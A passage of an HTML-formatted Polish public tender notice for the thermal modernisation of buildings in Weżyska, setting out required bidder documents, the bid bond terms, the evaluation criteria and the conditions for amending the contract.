OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia, spełnienia warunku dotyczącego zdolności technicznej lub zawodowejokreślonego w pkt. 10.1.3) SIWZ Zamawiający żąda od Wykonawcy: a) wykazu robótbudowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz zpodaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty tezostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostaływykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie zprzepisami prawa budowlanego i prawidłowo ukończone; wzór wykazu stanowi załącznik nr 4 doSIWZ Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przezpodmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczynyo obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - innedokumenty. W celu potwierdzenia warunku dotyczącego sytuacji ekonomicznej lub finansowejokreślonego w pkt 10.1.2) SIWZ Zamawiający żąda od Wykonawcy: b) informacji banku lubspółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej wysokość posiadanych środkówfinansowych lub zdolność kredytową Wykonawcy, nie wcześniej niż 1 miesiąc przed upływemterminu składania ofert. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentówdotyczących sytuacji finansowej lub ekonomicznej wymaganych przez Zamawiającego, możezłożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przezZamawiającego warunku udziału w postępowaniu. 7. Zamawiający wymaga by Wykonawca wraz zw/w dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu oraz brakpodstaw do wykluczenia Wykonawcy z udziału w postępowaniu złożył oświadczenie dotyczącezatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osóbwykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia,których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1* ustawy z dnia26 czerwca 1974 r. – Kodeks pracy – wzór oświadczenia stanowi - załącznik nr 8 do SIWZ. 8.Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej zamawiającegoinformacji, o której mowa w art. 86 ust. 5 ustawy Prawo zamówień publicznych, jest zobowiązanyprzekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samejgrupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Prawo zamówień publicznych –wzór oświadczenia stanowi załącznik nr 5 do SIWZ. W przypadku, gdy wykonawca należy do tejsamej grupy kapitałowej wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody,że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu oudzielenie zamówienia. Obowiązek ten w pełni obciąża wykonawcę.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia, spełnienia warunku dotyczącego zdolności technicznej lub zawodowejokreślonego w pkt. 10.1.3) SIWZ Zamawiający żąda od Wykonawcy: a) wykazu robótbudowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz zpodaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty tezostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostaływykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie zprzepisami prawa budowlanego i prawidłowo ukończone; wzór wykazu stanowi załącznik nr 4 doSIWZ Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przezpodmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczynyo obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - innedokumenty. W celu potwierdzenia warunku dotyczącego sytuacji ekonomicznej lub finansowejokreślonego w pkt 10.1.2) SIWZ Zamawiający żąda od Wykonawcy: b) informacji banku lubspółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej wysokość posiadanych środkówfinansowych lub zdolność kredytową Wykonawcy, nie wcześniej niż 1 miesiąc przed upływemterminu składania ofert. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentówdotyczących sytuacji finansowej lub ekonomicznej wymaganych przez Zamawiającego, możezłożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przezZamawiającego warunku udziału w postępowaniu. 7. Zamawiający wymaga by Wykonawca wraz zw/w dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu oraz brakpodstaw do wykluczenia Wykonawcy z udziału w postępowaniu złożył oświadczenie dotyczącezatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osóbwykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia,których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1* ustawy z dnia26 czerwca 1974 r. – Kodeks pracy – wzór oświadczenia stanowi - załącznik nr 8 do SIWZ. 8.Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej zamawiającegoinformacji, o której mowa w art. 86 ust. 5 ustawy Prawo zamówień publicznych, jest zobowiązanyprzekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samejgrupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Prawo zamówień publicznych –wzór oświadczenia stanowi załącznik nr 5 do SIWZ. W przypadku, gdy wykonawca należy do tejsamej grupy kapitałowej wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody,że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu oudzielenie zamówienia. Obowiązek ten w pełni obciąża wykonawcę.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Zamawiający wymaga by Wykonawca wraz z w/w dokumentami potwierdzającymi spełnianiewarunków udziału w postępowaniu oraz brak podstaw do wykluczenia Wykonawcy z udziału wpostępowaniu złożył oświadczenie dotyczące zatrudnienia przez Wykonawcę lub Podwykonawcęna podstawie umowy o pracę osób wykonujących wskazane przez zamawiającego czynności wzakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposóbokreślony w art. 22 § 1* ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy – wzór oświadczeniastanowi - załącznik nr 8 do SIWZ. 8. Wykonawca w terminie 3 dni od dnia zamieszczenia nastronie internetowej zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy Prawozamówień publicznych, jest zobowiązany przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24ust. 1 pkt 23 ustawy Prawo zamówień publicznych – wzór oświadczenia stanowi załącznik nr 5 doSIWZ. W przypadku, gdy wykonawca należy do tej samej grupy kapitałowej wraz ze złożeniemoświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nieprowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Obowiązek ten wpełni obciąża wykonawcę.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Wykonawca ubiegający się o udzielenie zamówienia jest zobowiązany do wniesienia wadium w wysokości:Część I - 5.000 zł (słownie: pięć tysięcy złotych),Część II – 5.000 zł (słownie: pięć tysięcy złotych) 2.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.3.	Wadium może być wnoszone w jednej lub kilku następujących formach wybranych przez wykonawcę:a)	pieniądzu,b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)	gwarancjach bankowych,d)	gwarancjach ubezpieczeniowych,e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.).Uwaga W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:a)	nazwę dającego zlecenie udzielenia gwarancji (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,c)	kwotę gwarancji,d)	termin ważności gwarancji,e)	bezwarunkowe zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie zamawiającego w przypadkach określonych w art.46 ust. 4a i 5 ustawy Prawo zamówień publicznych.4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto zamawiającego nr 64 1090 1551 0000 0000 5500 1056 z dopiskiem „Wpłata wadium – Termomodernizacja Weżyska” ze wskazaniem części, na którą składane jest wadium (tj. część I, część II, część I i II). Kopię przelewu należy załączyć do oferty.5.	W przypadkach, gdy wadium wnoszone jest w formach innych niż pieniądz, Wykonawca składa oryginał dokumentu wadium wraz z ofertą.6.	Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.7.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 14.8 i 14.9 SIWZ.8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, oświadczenia o którym mowa w art. 25 a ust. 1 ustawy Prawo zamówień publicznych, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Prawo zamówień publicznych, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.10.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.11.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.12.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 14.7 SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.13.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji jakości</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:1. Na podstawie art. 144 ustawy PZP Zamawiający dopuszcza możliwość zmiany postanowieńzawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy naponiższych warunkach. 2. Dopuszcza się zmianę terminów wykonania przedmiotu umowy wprzypadku, gdy jej ukończenie w terminie jest niemożliwie z powodu: 1) niekorzystnych warunkówatmosferycznych, geologicznych, archeologicznych, w szczególności w przypadkach: a) klęskiżywiołowej, uniemożliwiających przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów,niewypałów i niewybuchów, badań archeologicznych, odmiennych od przyjętych w dokumentacjiprojektowej warunków geologicznych (kategorie gruntu, kurzawka, głazy narzutowe itp.), odmiennychod przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnieniepodziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych, b)wystąpienia siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie c)wystąpienia konieczności realizacji dodatkowych robót budowlanych nie przewidzianych wdokumentacji projektowej, nieobjętych zamówieniem podstawowym, a niezbędnych dla realizacjiprzedmiotu umowy, uzgodnionych pisemnie przez obie strony, 2) w przypadku zaistnienia sytuacji, októrych mowa w art. 144 ust. 1 pkt. 4) ustawy Pzp. 3. W przypadku wystąpienia niekorzystnychwarunków atmosferycznych lub siły wyższej utrudniającej lub uniemożliwiającej prowadzenie prac –fakt ten musi mieć odzwierciedlenie w postaci wpisu do dziennika budowy i potwierdzonym przezinspektora nadzoru inwestorskiego. Zakończenie działania siły wyższej lub ustąpienie niekorzystnychwarunków atmosferycznych zostanie potwierdzone wpisem do dziennika budowy i potwierdzeniemtego faktu przez Inspektora Nadzoru Inwestorskiego. Zamawiający dopuszcza możliwość przedłużeniaterminu przewidzianego na realizację tej części zamówienia, o ilość dni w których te warunkiwystąpią. 4. Jeśli opóźnieniu ulegnie wykonanie przez podmioty zewnętrzne usług/czynnościkoniecznych do wykonania prac objętych niniejszą umową, z zastrzeżeniem, że Wykonawcą tychusług/czynności nie jest Wykonawca niniejszej umowy ani podmiot przez niego zaangażowany wrealizację umowy - termin realizacji będzie przesunięty o czas niezbędny do wykonania tychusług/czynności. 5. W przypadku wystąpienia okoliczności, których przyczyny leżą po stronieZamawiającego - termin realizacji będzie przesunięty o czas niezbędny do wykonania opóźnionychprac. 6. Jeżeli prace objęte umową zostały wstrzymane przez właściwe organy, z przyczynniezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie realizacji umowy - terminzakończenia realizacji umowy będzie przesunięty o czas niezbędny do wykonania prac wynikających zzaleceń właściwych organów. 7. Jeżeli prace projektowe ulegną przedłużeniu na skutekprzedłużających się ustaleń z Lubuskim Wojewódzkim Konserwatorem Zabytków - terminzakończenia realizacji umowy będzie przesunięty o czas niezbędny do wykonania prac wynikających zzaleceń właściwych organów, przy założeniu że przedłużające się ustalenia nie wynikają z przyczynleżących po stronie Wykonawcy. 8. Jeżeli z zaleceń i wskazań wydanych przez LubuskiegoWojewódzkiego Konserwatora Zabytków będzie wynikać konieczność wykonania dodatkowychbadań, opracowań, doprojektowania rozwiązań akceptowalnych, wykonania robót w sposób odmiennyniż zaprojektowany na etapie realizacji części rzeczowej zamówienia - termin zakończenia realizacjiumowy będzie przesunięty o czas niezbędny na dokonanie niezbędnych ustaleń, a wynagrodzeniemoże zostać odpowiednio zwiększone lub zmniejszone na zasadach określonych w paragrafie 12niniejszej Umowy. 9. W przypadku napotkania przez Wykonawcę lub Zamawiającego okolicznościniemożliwych do przewidzenia i niezależnych od nich, np. wystąpienia okoliczności związanych zdziałaniami osób trzecich uniemożliwiających wykonywanie prac, konieczności wykonaniazmian/korekt projektów, zmian przepisów prawa polskiego albo prawa wspólnotowego - terminrealizacji może zostać przesunięty o czas, kiedy realizacja zamówienia była niemożliwa z przyczynleżących po stronie Zamawiającego lub niezbędny do wykonania zmian. 10. Jeżeli zajdzie koniecznośćuzyskania wyroku sądowego lub innego orzeczenia sądu lub organu administracyjnego, któregokonieczności nie przewidziano 